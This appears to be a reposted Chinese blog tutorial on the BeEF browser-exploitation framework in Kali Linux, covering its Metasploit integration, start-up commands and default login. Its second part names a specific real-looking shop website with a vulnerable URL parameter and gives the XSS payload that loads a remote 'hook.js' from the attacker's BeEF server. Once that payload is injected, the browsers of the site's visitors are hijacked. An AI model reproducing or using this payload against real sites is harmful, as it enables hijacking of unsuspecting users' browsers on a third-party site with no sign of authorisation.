xss利用之kali神器beef

来源:互联网 发布:数据整理软件 编辑:程序博客网 时间:2024/06/08 07:56

1、beef基本配置

BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf

1、修改config.yaml

编辑
/usr/share/beef-xss/config.yaml

metasploit:            enable: false改为true

这里写图片描述

编辑
/usr/share/beef-xss/extensions/demos/config.yaml

enable:true改为false

编辑
/usr/share/beef-xss/extensions/metasploit/config.yaml

设置    ssl: true    ssl_version: 'TLSv1'

这里写图片描述

2、启动msf服务

service postgresql startservice metasploit startmsfconsoleload msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 SSL=y

3、运行BeEF.rb

cd /usr/share/beef-xss//usr/share/beef-xss/beef

(启动后不要关闭,不然登录界面会提示密码错误)

这里写图片描述

4、启动BeEF

弹出浏览器,输入默认用户名口令beef,即可登陆

主界面如图

这里写图片描述

2、废话不多说,直接上我们之前找到的xss网站 http://www.succulents-castle.com/Product.asp?BigClassName=aaa

由于为映射到公网,只能在自己内部测试,这里要xss注入攻击成功,有个关键的脚本

<script src="http://127.0.0.1:3000/hook.js"></script>注意这个127.0.0.1ip地址要改为自己本机的ip地址,比如192.168.1.1,就是你beef配置的ip


3、直接到我们beef里面,就可以看到劫持到的主机浏览器信息

ok

0 0